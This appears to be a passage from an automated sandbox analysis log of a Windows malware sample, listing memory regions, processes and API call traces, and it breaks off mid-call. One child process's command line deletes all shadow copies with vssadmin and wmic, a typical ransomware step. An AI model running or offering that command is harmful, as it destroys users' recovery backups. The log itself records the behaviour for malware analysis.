= 706 start_va = 0x7ff7625c0000 end_va = 0x7ff7625d0fff monitored = 0 entry_point = 0x7ff7625c16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 707 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 708 start_va = 0x720000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 709 start_va = 0x7ffd4d670000 end_va = 0x7ffd4d857fff monitored = 0 entry_point = 0x7ffd4d69ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 710 start_va = 0x7ffd4e1c0000 end_va = 0x7ffd4e26cfff monitored = 0 entry_point = 0x7ffd4e1d81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 711 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 712 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 713 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 714 start_va = 0x7ffd4df00000 end_va = 0x7ffd4df9cfff monitored = 0 entry_point = 0x7ffd4df078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 715 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 716 start_va = 0x820000 end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 717 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 718 start_va = 0x7ffd45030000 end_va = 0x7ffd45088fff monitored = 0 entry_point = 0x7ffd4503fbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 719 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 720 start_va = 0x7ffd4dc70000 end_va = 0x7ffd4deecfff monitored = 0 entry_point = 0x7ffd4dd44970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 721 start_va = 0x7ffd4da60000 end_va = 0x7ffd4db7bfff monitored = 0 entry_point = 0x7ffd4daa02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 722 start_va = 0x7ffd4d860000 end_va = 0x7ffd4d8c9fff monitored = 0 entry_point = 0x7ffd4d896d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 723 start_va = 0x7ffd4e9d0000 end_va = 0x7ffd4eb25fff monitored = 0 entry_point = 0x7ffd4e9da8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 724 start_va = 0x7ffd4d8d0000 end_va = 0x7ffd4da55fff monitored = 0 entry_point = 0x7ffd4d91ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 725 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 726 start_va = 0x7ffd50380000 end_va = 0x7ffd504c2fff monitored = 0 entry_point = 0x7ffd503a8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 727 start_va = 0x7ffd4e160000 end_va = 0x7ffd4e1bafff monitored = 0 entry_point = 0x7ffd4e1738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 728 start_va = 0x7ffd4e2e0000 end_va = 0x7ffd4e31afff monitored = 0 entry_point = 0x7ffd4e2e12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 729 start_va = 0x7ffd4db80000 end_va = 0x7ffd4dc40fff monitored = 0 entry_point = 0x7ffd4dba0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 730 start_va = 0x7ffd4b010000 end_va = 0x7ffd4b195fff monitored = 0 entry_point = 0x7ffd4b05d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 731 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 732 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 733 start_va = 0x9b0000 end_va = 0xb37fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 734 start_va = 0xb40000 end_va = 0xcc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 735 start_va = 0xcd0000 end_va = 0x20cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cd0000" filename = "" Region: id = 736 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 737 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 738 start_va = 0x7ffd4eb30000 end_va = 0x7ffd5008efff monitored = 0 entry_point = 0x7ffd4ec911f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 739 start_va = 0x7ffd4cb80000 end_va = 0x7ffd4cbc2fff monitored = 0 entry_point = 0x7ffd4cb94b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 740 start_va = 0x7ffd4cce0000 end_va = 0x7ffd4d323fff monitored = 0 entry_point = 0x7ffd4cea64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 741 start_va = 0x7ffd4e480000 end_va = 0x7ffd4e526fff monitored = 0 entry_point = 0x7ffd4e4958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 742 start_va = 0x7ffd500f0000 end_va = 0x7ffd50141fff monitored = 0 entry_point = 0x7ffd500ff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 743 start_va = 0x7ffd4cb70000 end_va = 0x7ffd4cb7efff monitored = 0 entry_point = 0x7ffd4cb73210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 744 start_va = 0x7ffd4d5b0000 end_va = 0x7ffd4d664fff monitored = 0 entry_point = 0x7ffd4d5f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 745 start_va = 0x7ffd4cb10000 end_va = 0x7ffd4cb5afff monitored = 0 entry_point = 0x7ffd4cb135f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 746 start_va = 0x7ffd4caf0000 end_va = 0x7ffd4cb03fff monitored = 0 entry_point = 0x7ffd4caf52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 747 start_va = 0x7ffd4b470000 end_va = 0x7ffd4b505fff monitored = 0 entry_point = 0x7ffd4b495570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 748 start_va = 0x640000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 749 start_va = 0x20d0000 end_va = 0x2406fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 750 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 751 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 752 start_va = 0x640000 end_va = 0x699fff monitored = 1 entry_point = 0x6553f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 753 start_va = 0x6a0000 end_va = 0x6c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 754 start_va = 0x6d0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 755 start_va = 0x2410000 end_va = 0x2624fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 756 start_va = 0x2630000 end_va = 0x2842fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 757 start_va = 0x820000 end_va = 0x934fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 758 start_va = 0x9a0000 end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 759 start_va = 0x2850000 end_va = 0x2a61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 760 start_va = 0x2a70000 end_va = 0x2b84fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 761 start_va = 0x640000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 762 start_va = 0x7ffd4e320000 end_va = 0x7ffd4e479fff monitored = 0 entry_point = 0x7ffd4e3638e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 763 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 764 start_va = 0x2b90000 end_va = 0x2c4bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b90000" filename = "" Region: id = 765 start_va = 0x70000 end_va = 0x73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 766 start_va = 0x7ffd4a370000 end_va = 0x7ffd4a391fff monitored = 0 entry_point = 0x7ffd4a371a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 767 start_va = 0x7ffd4b200000 end_va = 0x7ffd4b212fff monitored = 0 entry_point = 0x7ffd4b202760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 768 start_va = 0x7ffd4c900000 end_va = 0x7ffd4c955fff monitored = 0 entry_point = 0x7ffd4c910bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 769 start_va = 0x80000 end_va = 0x86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 770 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 771 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 772 start_va = 0x680000 end_va = 0x684fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 773 start_va = 0x690000 end_va = 0x690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 774 start_va = 0x6a0000 end_va = 0x6a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 775 start_va = 0x7ffd43ba0000 end_va = 0x7ffd43e13fff monitored = 0 entry_point = 0x7ffd43c10400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 776 start_va = 0x6b0000 end_va = 0x6b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 777 start_va = 0x6c0000 end_va = 0x6c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Thread: id = 22 os_tid = 0x1390 Thread: id = 23 os_tid = 0xb14 Thread: id = 24 os_tid = 0xcf4 Thread: id = 25 os_tid = 0x1384 Process: id = "8" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x88b2000" os_pid = "0x139c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin delete shadows /all /quiet && wmic shadowcopy delete" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 786 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 787 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 788 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 789 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 790 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 791 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 792 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 793 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 794 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 795 start_va = 0xd00000 end_va = 0xd51fff monitored = 1 entry_point = 0xd14fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 796 start_va = 0xd60000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 797 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 798 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 799 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 800 start_va = 0x7fff0000 end_va = 0x7dfd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 801 start_va = 0x7dfd504d0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd504d0000" filename = "" Region: id = 802 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 803 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 804 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 805 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 806 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 807 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 808 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 809 start_va = 0x5f0000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 810 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 811 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 812 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 813 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 895 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 896 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 897 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 898 start_va = 0x7e0000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 899 start_va = 0x1d0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 900 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 901 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 902 start_va = 0x8e0000 end_va = 0xc16fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 27 os_tid = 0x9cc [0149.883] GetModuleHandleA (lpModuleName=0x0) returned 0xd00000 [0149.883] __set_app_type (_Type=0x1) [0149.883] __p__fmode () returned 0x74ac4d6c [0149.883] __p__commode () returned 0x74ac5b1c [0149.883] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd15200) returned 0x0 [0149.883] __getmainargs (in: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0, _DoWildCard=0, _StartInfo=0xd260fc | out: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0) returned 0 [0149.883] GetCurrentThreadId () returned 0x9cc [0149.883] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9cc) returned 0x84 [0149.884] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0149.884] GetProcAddress (hModule=0x74f30000, lpProcName="SetThreadUILanguage") returned 0x74f72510 [0149.884] SetThreadUILanguage (LangId=0x0) returned 0x409 [0149.891] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0149.891] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0149.891] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.892] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0149.892] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0149.892] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.892] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0149.892] GetConsoleOutputCP () returned 0x1b5 [0149.902] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0149.902] SetConsoleCtrlHandler (HandlerRoutine=0xd20e40, Add=1) returned 1 [0149.903] _get_osfhandle (_FileHandle=1) returned 0x3c [0149.903] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0149.904] _get_osfhandle (_FileHandle=1) returned 0x3c [0149.904] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0149.910] _get_osfhandle (_FileHandle=1) returned 0x3c [0149.910] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0149.958] _get_osfhandle (_FileHandle=0) returned 0x38 [0149.958] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0149.961] _get_osfhandle (_FileHandle=0) returned 0x38 [0149.961] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a7) returned 1 [0149.962] GetEnvironmentStringsW () returned 0x6e7d58* [0149.962] GetProcessHeap () returned 0x6e0000 [0149.962] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xa1a) returned 0x6e8780 [0149.963] FreeEnvironmentStringsA (penv="A") returned 1 [0149.963] GetProcessHeap () returned 0x6e0000 [0149.963] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x4) returned 0x6e0550 [0149.963] GetEnvironmentStringsW () returned 0x6e7d58* [0149.963] GetProcessHeap () returned 0x6e0000 [0149.963] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xa1a) returned 0x6e91a8 [0149.963] FreeEnvironmentStringsA (penv="A") returned 1 [0149.963] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0149.963] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0149.963] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0149.963] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0149.963] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0149.963] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0149.963] RegQueryValueExW (in: hKey=0x94, 